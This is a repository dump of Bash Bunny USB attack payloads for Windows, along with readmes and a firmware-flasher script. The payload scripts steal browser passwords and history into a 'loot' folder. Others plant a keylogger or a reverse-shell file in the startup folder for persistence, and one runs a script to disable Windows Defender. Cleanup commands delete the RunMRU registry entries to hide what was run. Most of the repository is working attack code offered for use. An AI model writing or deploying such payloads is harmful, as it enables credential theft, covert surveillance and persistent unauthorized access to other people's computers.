├── BHG ├── Clean.ps1 ├── GetDrive.ps1 ├── history.exe ├── payload.txt └── readme.md ├── BPG ├── Clean.ps1 ├── GetDrive.ps1 ├── pass.exe ├── payload.txt └── readme.md ├── Binary-s ├── USB PWNR │ ├── history.exe │ ├── pass.exe │ └── readme.md └── readme.md ├── BunnyFlasher ├── BunnyFlasher.ps1 ├── SourceCode │ ├── bunnyflasher.txt │ └── icon.ico └── readme.md ├── KeyHopper ├── GetDrive.ps1 ├── payload.txt └── readme.md ├── README.md ├── Reverse-Shell ├── Clean.ps1 ├── GetDrive.ps1 ├── copy-reverse.txt ├── payload.txt └── readme.md ├── USB-PWNR -SLOW ├── Payloads - Readme's │ ├── payload-files.txt │ ├── readme-BHG.md │ ├── readme-BPG.md │ ├── readme-InfoGrabber.md │ └── readme-reverse-shell.md └── readme.md └── USB-PWNR ├── Clean.ps1 ├── GetDrive.ps1 ├── Payloads-Readme-s ├── payload-files.txt ├── readme-BHG.md ├── readme-BPG.md ├── readme-InfoGrabber.md └── readme-reverse-shell.md ├── disable-anti-virus.ps1 ├── info.ps1 ├── payload.txt ├── readme.md └── run.ps1 /BHG/Clean.ps1: -------------------------------------------------------------------------------- 1 | -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" -------------------------------------------------------------------------------- /BHG/GetDrive.ps1: -------------------------------------------------------------------------------- 1 | (gwmi -class win32_volume -filter "label='BashBunny'").Name | Clip -------------------------------------------------------------------------------- /BHG/history.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CIPH3R0/BashBunny/da412de0a9876a05350caf7ef18cbc06065ef9b5/BHG/history.exe -------------------------------------------------------------------------------- /BHG/payload.txt: -------------------------------------------------------------------------------- 1 | #BHG (BrowserHistoryGrabber) 2 | #Steals all browser history in seconds 3 | 4 | #Setup 5 | LED SETUP 6 | GET SWITCH_POSITION 7 | ATTACKMODE HID STORAGE 8 | 9 | #Atack fase 10 | LED ATTACK 11 | #Copy driveletter by running GetDrive.ps1 12 | RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetDrive.ps1')" 13 | Q DELAY 800 14 | #Start program 15 | RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\history.exe')" 16 | Q DELAY 1500 17 | Q ENTER 18 | Q DELAY 3000 19 | Q CONTROL a 20 | Q DELAY 500 21 | Q CONTROL s 22 | Q DELAY 500 23 | Q STRING %computername% - History 24 | Q F4 25 | Q DELAY 100 26 | Q CONTROL a 27 | Q DELAY 100 28 | Q CONTROL v 29 | Q DELAY 100 30 | Q STRING loot 31 | Q DELAY 200 32 | Q ENTER 33 | Q DELAY 500 34 | Q TAB 35 | Q TAB 36 | Q TAB 37 | Q TAB 38 | Q TAB 39 | Q TAB 40 | Q ENTER 41 | Q DELAY 100 42 | Q ALT F4 43 | 44 | #Cleaning up 45 | LED CLEANUP 46 | QUACK GUI r 47 | QUACK DELAY 500 48 | QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" 49 | QUACK ENTER 50 | 51 | LED FINISH 52 | ATTACKMODE OFF -------------------------------------------------------------------------------- /BHG/readme.md: -------------------------------------------------------------------------------- 1 | # BPG (BrowserHistoryGrabber) 2 | 3 | * Author: C1PH3R 4 | * Creds: C1PH3R, Nirsoft 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Grabs history from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 10 | This payload is quick and takes about 15 seconds after insertion 11 | 12 | #No configuration needed 13 | 14 | 15 | | LED | Status | 16 | | ------------------ | -------------------------------------------- | 17 | | Amber | Attack Setup | 18 | | Green | Attack Complete | 19 | 20 | #No discussion jet! 21 | 22 | "Don't look at the branch of the problem, look at the root! (C1PH3R)" 23 | -------------------------------------------------------------------------------- /BPG/Clean.ps1: -------------------------------------------------------------------------------- 1 | -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" -------------------------------------------------------------------------------- /BPG/GetDrive.ps1: -------------------------------------------------------------------------------- 1 | (gwmi -class win32_volume -filter "label='BashBunny'").Name | Clip -------------------------------------------------------------------------------- /BPG/pass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CIPH3R0/BashBunny/da412de0a9876a05350caf7ef18cbc06065ef9b5/BPG/pass.exe -------------------------------------------------------------------------------- /BPG/payload.txt: -------------------------------------------------------------------------------- 1 | #BPG (BrowserPasswordGrabber) 2 | #Steals all browser passwords in seconds 3 | 4 | #Setup 5 | LED SETUP 6 | GET SWITCH_POSITION 7 | ATTACKMODE HID STORAGE 8 | 9 | #Atack fase 10 | LED ATTACK 11 | #Copy driveletter by running GetDrive.ps1 12 | RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetDrive.ps1')" 13 | Q DELAY 800 14 | #Start program 15 | RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\pass.exe')" 16 | Q DELAY 1800 17 | Q CONTROL a 18 | Q DELAY 500 19 | Q CONTROL s 20 | Q DELAY 500 21 | Q STRING %computername% - Pass 22 | Q F4 23 | Q DELAY 100 24 | Q CONTROL a 25 | Q DELAY 100 26 | Q CONTROL v 27 | Q DELAY 100 28 | Q STRING loot 29 | Q DELAY 200 30 | Q ENTER 31 | Q DELAY 500 32 | Q TAB 33 | Q TAB 34 | Q TAB 35 | Q TAB 36 | Q TAB 37 | Q TAB 38 | Q ENTER 39 | Q DELAY 100 40 | Q ALT F4 41 | 42 | #Cleaning up 43 | LED CLEANUP 44 | QUACK GUI r 45 | QUACK DELAY 500 46 | QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" 47 | QUACK ENTER 48 | 49 | LED FINISH 50 | ATTACKMODE OFF 51 | -------------------------------------------------------------------------------- /BPG/readme.md: -------------------------------------------------------------------------------- 1 | # BPG (BrowserPasswordGrabber) 2 | 3 | * Author: C1PH3R 4 | * Creds: C1PH3R, Nirsoft 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Grabs passwords from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 10 | This payload is quick and takes about 15 seconds after insertion 11 | 12 | #No configuration needed 13 | 14 | 15 | | LED | Status | 16 | | ------------------ | -------------------------------------------- | 17 | | Amber | Attack Setup | 18 | | Green | Attack Complete | 19 | 20 | #No discussion jet! 21 | 22 | "Don't look at the branch of the problem, look at the root! (C1PH3R)" 23 | -------------------------------------------------------------------------------- /Binary-s/USB PWNR/history.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CIPH3R0/BashBunny/da412de0a9876a05350caf7ef18cbc06065ef9b5/Binary-s/USB PWNR/history.exe -------------------------------------------------------------------------------- /Binary-s/USB PWNR/pass.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CIPH3R0/BashBunny/da412de0a9876a05350caf7ef18cbc06065ef9b5/Binary-s/USB PWNR/pass.exe -------------------------------------------------------------------------------- /Binary-s/USB PWNR/readme.md: -------------------------------------------------------------------------------- 1 | 2 | All of the binary's of USB PWNR! 3 | -------------------------------------------------------------------------------- /Binary-s/readme.md: -------------------------------------------------------------------------------- 1 | Containing the binary's of various projects/payloads. 2 | -------------------------------------------------------------------------------- /BunnyFlasher/BunnyFlasher.ps1: -------------------------------------------------------------------------------- 1 | # For the SourceCode 2 | #I did not tought that I would opencource this project so it is not well commented or clean! 3 | 4 | 5 | $start_time = Get-Date 6 | Import-Module BitsTransfer 7 | $driveletter = (gwmi -class win32_volume -filter "label='BashBunny'").Name 8 | 9 | $image = { 10 | '____ _____ _ _ 11 | | __ ) _ _ _ __ _ __ _ _| ___| | __ _ ___| |__ ___ _ __ 12 | | _ \| | | | _ \| _ \| | | | |_ | | / _ / __| _ \ / _ \ __| 13 | | |_) | |_| | | | | | | | |_| | _| | |__| (_| \__ \ | | | __/ | 14 | |____/ \__ _|_| |_|_| |_|\__ |_| |_____\__ _|___/_| |_|\___|_| 15 | |___/' 16 | } 17 | 18 | $image 19 | echo 'Bunny-Flasher' 20 | echo '=============' 21 | echo '[1] Firmware options' 22 | echo '[2] Exit' 23 | $userinput = Read-Host -Prompt 'ENTER your choise' 24 | 25 | If ($userinput -eq 1) { 26 | 27 | cls 28 | $image 29 | echo 'Choose your firmware' 30 | echo '====================' 31 | echo '[1] 1.5 (newest)' 32 | echo '[2] 1.4' 33 | echo '[3] 1.3' 34 | echo '[4] 1.2' 35 | echo '[5] 1.1' 36 | $userinput2 = Read-Host -Prompt 'ENTER your choise' 37 | 38 | If ($userinput2 -eq 1) { 39 | 40 | cls 41 | $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.5_298.tar.gz" 42 | $output = "$driveletter\ch_fw_1.5_298.tar.gz" 43 | Start-BitsTransfer -Source $url -Destination $output 44 | Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)" 45 | cls 46 | $image 47 | echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.' 48 | echo 'Press ENTER to exit' 49 | echo "" 50 | $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown") 51 | exit 52 | 53 | } 54 | 55 | Elseif ($userinput2 -eq 2) { 56 | 57 | cls 58 | $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.4_284.tar.gz" 59 | $output = "$driveletter\ch_fw_1.5_298.tar.gz" 60 | Start-BitsTransfer -Source $url -Destination $output 61 | Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)" 62 | cls 63 | $image 64 | echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.' 65 | echo "" 66 | echo 'Press ENTER to exit' 67 | $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown") 68 | exit 69 | 70 | } 71 | 72 | Elseif ($userinput2 -eq 3) { 73 | cls 74 | $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.3_264.tar.gz" 75 | $output = "$driveletter\ch_fw_1.5_298.tar.gz" 76 | Start-BitsTransfer -Source $url -Destination $output 77 | Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)" 78 | cls 79 | $image 80 | echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.' 81 | echo "" 82 | echo 'Press ENTER to exit' 83 | $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown") 84 | exit 85 | } 86 | 87 | Elseif ($userinput2 -eq 4) { 88 | 89 | cls 90 | $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.2_249.tar.gz" 91 | $output = "$driveletter\ch_fw_1.5_298.tar.gz" 92 | Start-BitsTransfer -Source $url -Destination $output 93 | Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)" 94 | cls 95 | $image 96 | echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.' 97 | echo "" 98 | echo 'Press ENTER to exit' 99 | $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown") 100 | exit 101 | 102 | } 103 | 104 | Elseif ($userinput2 -eq 5) { 105 | 106 | cls 107 | $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.1_228.tar.gz" 108 | $output = "$driveletter\ch_fw_1.5_298.tar.gz" 109 | Start-BitsTransfer -Source $url -Destination $output 110 | Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)" 111 | cls 112 | $image 113 | echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.' 114 | echo "" 115 | echo 'Press ENTER to exit' 116 | $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown") 117 | exit 118 | 119 | } 120 | 121 | else { 122 | 123 | cls 124 | $image 125 | echo 'That was not one of the options!' 126 | echo "" 127 | echo 'Press ENTER to exit' 128 | $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown") 129 | exit 130 | 131 | } 132 | 133 | } 134 | 135 | Elseif ($userinput -eq 2) { 136 | exit 137 | } 138 | 139 | else { 140 | cls 141 | $image 142 | echo 'That was not one of the options!' 143 | echo "" 144 | echo 'Press ENTER to exit' 145 | $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown") 146 | exit 147 | } 148 | 149 | cls 150 | $image 151 | echo 'An unknow error has occured, please send a screenshot with detailed info of what happend to error@c1ph3r.nl' -------------------------------------------------------------------------------- /BunnyFlasher/SourceCode/bunnyflasher.txt: -------------------------------------------------------------------------------- 1 | $start_time = Get-Date 2 | Import-Module BitsTransfer 3 | $driveletter = (gwmi -class win32_volume -filter "label='BashBunny'").Name 4 | 5 | $image = { 6 | '____ _____ _ _ 7 | | __ ) _ _ _ __ _ __ _ _| ___| | __ _ ___| |__ ___ _ __ 8 | | _ \| | | | _ \| _ \| | | | |_ | | / _ / __| _ \ / _ \ __| 9 | | |_) | |_| | | | | | | | |_| | _| | |__| (_| \__ \ | | | __/ | 10 | |____/ \__ _|_| |_|_| |_|\__ |_| |_____\__ _|___/_| |_|\___|_| 11 | |___/' 12 | } 13 | 14 | $image 15 | echo 'Bunny-Flasher' 16 | echo '=============' 17 | echo '[1] Firmware options' 18 | echo '[2] Exit' 19 | $userinput = Read-Host -Prompt 'ENTER your choise' 20 | 21 | If ($userinput -eq 1) { 22 | 23 | cls 24 | $image 25 | echo 'Choose your firmware' 26 | echo '====================' 27 | echo '[1] 1.5 (newest)' 28 | echo '[2] 1.4' 29 | echo '[3] 1.3' 30 | echo '[4] 1.2' 31 | echo '[5] 1.1' 32 | $userinput2 = Read-Host -Prompt 'ENTER your choise' 33 | 34 | If ($userinput2 -eq 1) { 35 | 36 | cls 37 | $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.5_298.tar.gz" 38 | $output = "$driveletter\ch_fw_1.5_298.tar.gz" 39 | Start-BitsTransfer -Source $url -Destination $output 40 | Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)" 41 | cls 42 | $image 43 | echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.' 44 | echo 'Press ENTER to exit' 45 | echo "" 46 | $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown") 47 | exit 48 | 49 | } 50 | 51 | Elseif ($userinput2 -eq 2) { 52 | 53 | cls 54 | $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.4_284.tar.gz" 55 | $output = "$driveletter\ch_fw_1.5_298.tar.gz" 56 | Start-BitsTransfer -Source $url -Destination $output 57 | Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)" 58 | cls 59 | $image 60 | echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.' 61 | echo "" 62 | echo 'Press ENTER to exit' 63 | $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown") 64 | exit 65 | 66 | } 67 | 68 | Elseif ($userinput2 -eq 3) { 69 | cls 70 | $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.3_264.tar.gz" 71 | $output = "$driveletter\ch_fw_1.5_298.tar.gz" 72 | Start-BitsTransfer -Source $url -Destination $output 73 | Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)" 74 | cls 75 | $image 76 | echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.' 77 | echo "" 78 | echo 'Press ENTER to exit' 79 | $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown") 80 | exit 81 | } 82 | 83 | Elseif ($userinput2 -eq 4) { 84 | 85 | cls 86 | $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.2_249.tar.gz" 87 | $output = "$driveletter\ch_fw_1.5_298.tar.gz" 88 | Start-BitsTransfer -Source $url -Destination $output 89 | Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)" 90 | cls 91 | $image 92 | echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.' 93 | echo "" 94 | echo 'Press ENTER to exit' 95 | $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown") 96 | exit 97 | 98 | } 99 | 100 | Elseif ($userinput2 -eq 5) { 101 | 102 | cls 103 | $url = "https://storage.googleapis.com/bashbunny_updates/ch_fw_1.1_228.tar.gz" 104 | $output = "$driveletter\ch_fw_1.5_298.tar.gz" 105 | Start-BitsTransfer -Source $url -Destination $output 106 | Write-Output "Time taken: $((Get-Date).Subtract($start_time).Seconds) second(s)" 107 | cls 108 | $image 109 | echo 'Done, now safely eject your Bunny and plug it back in. Wait for the policelights to stop and then you are all set.' 110 | echo "" 111 | echo 'Press ENTER to exit' 112 | $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown") 113 | exit 114 | 115 | } 116 | 117 | else { 118 | 119 | cls 120 | $image 121 | echo 'That was not one of the options!' 122 | echo "" 123 | echo 'Press ENTER to exit' 124 | $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown") 125 | exit 126 | 127 | } 128 | 129 | } 130 | 131 | Elseif ($userinput -eq 2) { 132 | exit 133 | } 134 | 135 | else { 136 | cls 137 | $image 138 | echo 'That was not one of the options!' 139 | echo "" 140 | echo 'Press ENTER to exit' 141 | $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown") 142 | exit 143 | } 144 | 145 | cls 146 | $image 147 | echo 'An unknow error has occured, please send a screenshot with detailed info of what happend to error@c1ph3r.nl' 148 | -------------------------------------------------------------------------------- /BunnyFlasher/SourceCode/icon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CIPH3R0/BashBunny/da412de0a9876a05350caf7ef18cbc06065ef9b5/BunnyFlasher/SourceCode/icon.ico -------------------------------------------------------------------------------- /BunnyFlasher/readme.md: -------------------------------------------------------------------------------- 1 | # Firmware flasher for the Bashbunny, able to flash firmware from 1.1 to 1.5. 2 | 3 | * 1 Drag and drop the .exe file anyware on your computer. 4 | * 2 Put in your BashBunny. 5 | * 3 Open the .exe, and follow the steps on screen. 6 | 7 | XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 8 | ###### Disclaimer: This is not an official firmware flasher, use at your own risk! 9 | XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 10 | 11 | # For the SourceCode 12 | * I did not tought that I would opencource this project so it is not well commented or clean! 13 | * I have deleted the .exe file due to falsepositive messages on AntiVirusses and because Admins tought my code was malisious, now my code is opensourced so everyone see's what is going on. do note that if you want you can compile a .exe for yourself at any time. (I am just not going to give a .exe to you because people would think it is malisious.) 14 | -------------------------------------------------------------------------------- /KeyHopper/GetDrive.ps1: -------------------------------------------------------------------------------- 1 | (gwmi -class win32_volume -filter "label='BashBunny'").Name | Clip -------------------------------------------------------------------------------- /KeyHopper/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #KeyHopper 4 | #Spawns a keylogger and adds it to shell:startup 5 | 6 | #Delay CONFIGURATION 7 | #Edit the lines below to change the standard delays in the script 8 | #SFD = Super Fast delay (waiting for CTRL v for example) FASTMODE(standard)=100 SLOWMODE=500 9 | SFD="100" 10 | #FD = Fast delay (waiting for CTRL v for example) FASTMODE(standard)=500 SLOWMODE=1000 11 | FD="500" 12 | #ND = Normal delay (waiting for programs to shut off) FASTMODE(standard)=1000 SLOWMODE=2000 13 | ND="1000" 14 | #LD = Long delay (waiting for programs to start or bash scipts to execute) FASTMODE(standard)=1500 SLOWMODE=3500 15 | LD="1500" 16 | 17 | #KeyloggerName CONFIGURATION 18 | name=servicehost.txt 19 | 20 | #Shutting off CONFIGURATION 21 | #Edit the line below to shut the bunny off after finishing ("" = turn off / "#" = Do not turn off) 22 | AM="#" 23 | 24 | #Editing text below this line may prevent the script from working! (Except for changing servicehost.txt) 25 | 26 | #Setup 27 | LED SETUP 28 | ATTACKMODE HID STORAGE 29 | GET SWITCH_POSITION 30 | #Wait for the computer to recognise the drive etc 31 | Q delay $LD 32 | Q delay $LD 33 | Q delay $LD 34 | #Get drive letter and copy it: 35 | RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetDrive.ps1')" 36 | Q DELAY $ND 37 | 38 | 39 | #Copy keylogger and add it to shell:startup 40 | LED STAGE4 41 | Q GUI r 42 | Q DELAY $SFD 43 | Q STRING powershell 44 | Q ENTER 45 | Q DELAY $FD 46 | Q STRING copy 47 | Q SPACE 48 | Q DELAY $ND 49 | Q CONTROL v 50 | Q DELAY $FD 51 | Q BACKSPACE 52 | Q DELAY $FD 53 | Q STRING "payloads\\"$name" 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'" 54 | Q ENTER 55 | Q DELAY $FD 56 | Q STRING "start 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\"$name"\'" 57 | Q DELAY $SFD 58 | Q ENTER 59 | Q ALT F4 60 | Q DELAY $LD 61 | Q DELAY $LD 62 | 63 | #Cleaning up fase 64 | LED CLEANUP 65 | RUN WIN powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" 66 | Q ENTER 67 | 68 | LED FINISH 69 | $AM ATTACKMODE OFF 70 | -------------------------------------------------------------------------------- /KeyHopper/readme.md: -------------------------------------------------------------------------------- 1 | # KeyHopper 2 | * Written by: C1PH3R 3 | * Creds: C1PH3R 4 | * Target: Windows 5 | 6 | # Description: 7 | 8 | # Does the following: 9 | 10 | - [x] Start's a keylogger and copy's it to shell:startup 11 | 12 | 13 | # Configuration: 14 | * Download/make a keylogger using whatever program you want (sAINT for example) 15 | * Place a file whatever.whatever in Bashbunny/payloads 16 | * Replace the text: servicehost.txt in payload.txt file to whatever.whatever (Whatever = the filetype/name you have selected for your keylogger) 17 | * Optional: edit the "Delay CONFIGURATION" in payload file to your preferences to make the payload work with slower/older or faster/newer computers 18 | * Optional: edit the "Shutting off CONFIGURATION" in the payload file to shut the bunny off after the payload is done 19 | 20 | 21 | 22 | | LED | Status | 23 | | ------------------ | -------------------------------------------- | 24 | | Amber | Attack Setup | 25 | | Stage (blinking) | Bussy (do not remove stick) | 26 | | Green | Attack Complete | 27 | | Red | Fail | 28 | 29 | * No discussion jet! 30 | 31 | # "Don't look at the branch of the problem, look at the root! (C1PH3R)" 32 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # BashBunny 2 | My BashBunny scripts 3 | "Don't look at the branch of the problem, look at the root! (C1PH3R)" 4 | -------------------------------------------------------------------------------- /Reverse-Shell/Clean.ps1: -------------------------------------------------------------------------------- 1 | -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" -------------------------------------------------------------------------------- /Reverse-Shell/GetDrive.ps1: -------------------------------------------------------------------------------- 1 | (gwmi -class win32_volume -filter "label='BashBunny'").Name | Clip -------------------------------------------------------------------------------- /Reverse-Shell/copy-reverse.txt: -------------------------------------------------------------------------------- 1 | GUI r 2 | DELAY 200 3 | STRING powershell 4 | ENTER 5 | DELAY 500 6 | STRING copy 7 | SPACE 8 | CONTROL v 9 | BACKSPACE 10 | STRING payloads\servicehost.txt 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' 11 | ENTER 12 | DELAY 200 13 | STRING start 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicehost.txt' 14 | ENTER 15 | DELAY 5000 16 | STRING exit 17 | ENTER 18 | DELAY 200 -------------------------------------------------------------------------------- /Reverse-Shell/payload.txt: -------------------------------------------------------------------------------- 1 | #Copy reverse shell file to shell:startup and start it 2 | 3 | 4 | #Setup 5 | LED SETUP 6 | GET SWITCH_POSITION 7 | ATTACKMODE HID STORAGE 8 | 9 | Q DELAY 5000 10 | 11 | #Atack fase 12 | LED ATTACK 13 | #Disable AntiVirus (Windows Defender) 14 | RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')" 15 | Q DELAY 1000 16 | Q LEFT 17 | Q ENTER 18 | #Copy driveletter by running GetDrive.ps1 19 | RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetDrive.ps1')" 20 | Q 1000 21 | 22 | #Move servicehost.txt to shell:startup 23 | 24 | QUACK switch1/copy-reverse.txt 25 | 26 | #Cleaning up 27 | LED CLEANUP 28 | QUACK GUI r 29 | QUACK DELAY 500 30 | QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" 31 | QUACK ENTER 32 | 33 | LED FINISH 34 | #ATTACKMODE OFF 35 | -------------------------------------------------------------------------------- /Reverse-Shell/readme.md: -------------------------------------------------------------------------------- 1 | # Reverse-Shell 2 | 3 | * Author: C1PH3R 4 | * Creds: C1PH3R 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Copy's the file servicehost.txt to startup directory: shell:startup and executes it. 10 | 11 | ##Configruation 12 | #Replace the text: servicehost.txt in payload.txt as well as in the copy-reverse.txt file with servicehost.whatever 13 | #(Whatever) = the filetype you have selected as your reverse shell 14 | 15 | 16 | | LED | Status | 17 | | ------------------ | -------------------------------------------- | 18 | | Amber | Attack Setup | 19 | | Green | Attack Complete | 20 | 21 | #No discussion jet! 22 | 23 | #"Don't look at the branch of the problem, look at the root! (C1PH3R)" 24 | -------------------------------------------------------------------------------- /USB-PWNR -SLOW/Payloads - Readme's/payload-files.txt: -------------------------------------------------------------------------------- 1 | You can find the payload files at: 2 | 3 | BPG: https://github.com/CIPH3R0/BashBunny/tree/master/BPG 4 | 5 | BHG: https://github.com/CIPH3R0/BashBunny/tree/master/BHG 6 | 7 | InfoGrabber: https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber 8 | 9 | Reverse-shell: https://github.com/CIPH3R0/BashBunny/tree/master/Reverse-Shell -------------------------------------------------------------------------------- /USB-PWNR -SLOW/Payloads - Readme's/readme-BHG.md: -------------------------------------------------------------------------------- 1 | # BPG (BrowserHistoryGrabber) 2 | 3 | * Author: speedy22013 4 | * Creds: speedy22013, Nirsoft 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Grabs history from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 10 | This payload is quick and takes about 15 seconds after insertion 11 | 12 | #No configuration needed 13 | 14 | 15 | | LED | Status | 16 | | ------------------ | -------------------------------------------- | 17 | | Amber | Attack Setup | 18 | | Green | Attack Complete | 19 | 20 | #No discussion jet! 21 | 22 | -------------------------------------------------------------------------------- /USB-PWNR -SLOW/Payloads - Readme's/readme-BPG.md: -------------------------------------------------------------------------------- 1 | # BPG (BrowserPasswordGrabber) 2 | 3 | * Author: speedy22013 4 | * Creds: speedy22013, Nirsoft 5 | * Target: Windows 6 | 7 | ## Description 8 | 9 | Grabs passwords from web browsers: Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. 10 | This payload is quick and takes about 15 seconds after insertion 11 | 12 | #No configuration needed 13 | 14 | 15 | | LED | Status | 16 | | ------------------ | -------------------------------------------- | 17 | | Amber | Attack Setup | 18 | | Green | Attack Complete | 19 | 20 | #No discussion jet! 21 | 22 | -------------------------------------------------------------------------------- /USB-PWNR -SLOW/Payloads - Readme's/readme-InfoGrabber.md: -------------------------------------------------------------------------------- 1 | # Info Grabber for the BashBunny 2 | 3 | Original Author Simen Kjeserud 4 | 5 | V2.0 Author: DannyK999 6 | 7 | Version: Version 2.0 8 | 9 | Credit: Hak5Darren, Hak5 and Simen Kjeserud for inspiration 10 | 11 | 12 | ((`\ 13 | ___ \\ '--._ 14 | .'` `' o ) 15 | / \ '. __.' 16 | _| /_ \ \_\_ 17 | {_\______\-'\__\_\ 18 | Check out Simen's website: 19 | aknemis.com 20 | 21 | ## Description 22 | 23 | Gather a lot of information about the computer and place it in a text file in loot/info/. 24 | 25 | Updates include code/output cleanup, faster runtime, and more veiled execution. 26 | 27 | Here you can se what it will look like: 28 | 29 | 30 | System Information for: DESKTOP-9BVPPVN 31 | 32 | Manufacturer: Dell Inc. 33 | 34 | Model: XPS 13 9360 35 | 36 | Serial Number: ******* 37 | 38 | CPU: Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz 39 | 40 | HDD Capacity: 464.38GB 41 | 42 | HDD Space: 82.32 % Free (382.28GB) 43 | 44 | RAM: 15.89GB 45 | 46 | Operating System: Microsoft 